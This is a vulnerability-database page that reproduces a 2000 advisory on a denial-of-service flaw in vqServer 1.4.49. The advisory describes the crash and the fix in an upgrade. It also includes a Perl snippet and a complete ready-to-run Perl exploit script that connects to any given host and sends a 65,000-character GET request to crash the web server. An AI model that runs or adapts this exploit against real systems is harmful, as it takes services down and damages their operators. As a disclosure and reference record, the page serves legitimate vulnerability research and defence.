Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

vqserver.dos.txt

🗓️ 29 Aug 2000 00:00:00Reported by nemesystmType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 41 Views

DHC Advisory details a DoS vulnerability in vqServer 1.4.49 via malformed URL requests.

Code
`DHC Advisory  
Advisory for vqServer 1.4.49  
vqServer is made by vqSoft. Site: http://www.vqsoft.com  
by nemesystm of the DHC  
(http://dhcorp.cjb.net - [email protected])  
  
/-|=[explaination]=|-\  
When sending vqServer version 1.4.49 a malformed URL request it will crash   
the service. This has been verified to work on the Windows version, but   
it probably is in the linux/unix version and prior versions too.  
  
/-|=[testing it]=|-\  
To test this vulnerability, send a GET request with 65000 characters.  
So:  
GET /AAA (hit return =)  
Where AAA = 65000, seeing as Internet Explorer, nor Netscape lets you paste   
that much characters in their browser fields (www.server.com/AAA) you will   
have to use something like Telnet.   
You can easily program something to print 65000 chars in Perl:  
open (OUT, ">$ARGV[0]");  
print OUT ("GET /");  
print OUT ("A" x 65000);  
then it's just a cut and paste.  
Or you can use the example code below  
  
/-|=[fix]=|-\  
the latest edition of vqServer (1.9.47) is unaffected by this. It is available   
for download at www.vqsoft.com  
  
/-|=[notes]=|-\  
PUT, POST and the Administration port do not seem to be affected by a high   
amount of characters. The Windows version needed a reinstall every five   
or so crashes. A reboot or total shutdown did not help.   
  
/-|=[exploit code]=|-\  
sinfony quickly wrote some code so you can see if you're vulnerable.  
  
#!/usr/bin/perl   
# DoS exploit for vqServer 1.4.49   
# This vulnerability was discovered by nemesystm   
# ([email protected])  
#  
# code by: sinfony ([email protected])   
# [confess.sins.labs] (http://www.ro0t.nu/csl)   
# and DHC member   
#  
# kiddie quote of the year:  
# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it   
  
die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n  
usage: $0 <host> \n"   
if $#ARGV != 0;   
  
use IO::Socket;  
  
$host = $ARGV[0];  
$port = 80;  
  
print "Connecting to $host on port $port...\n";   
$suck = IO::Socket::INET->  
new(Proto=>"tcp",   
PeerAddr=>$host,  
PeerPort=>$port)  
|| die "$host isnt a webserver you schmuck.\n";   
  
$a = A;  
$send = $a x 65000;  
print "Connected, sending exploit.\n";  
print $suck "GET /$send\n";   
sleep(3);   
print "Exploit sent. vqServer should be dead.\n";  
close($suck)`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Aug 2000 00:00Current
7.4High risk
Vulners AI Score7.4
dhc advisory vqserver vulnerability denial of service malformed url windows version linux version exploit code
41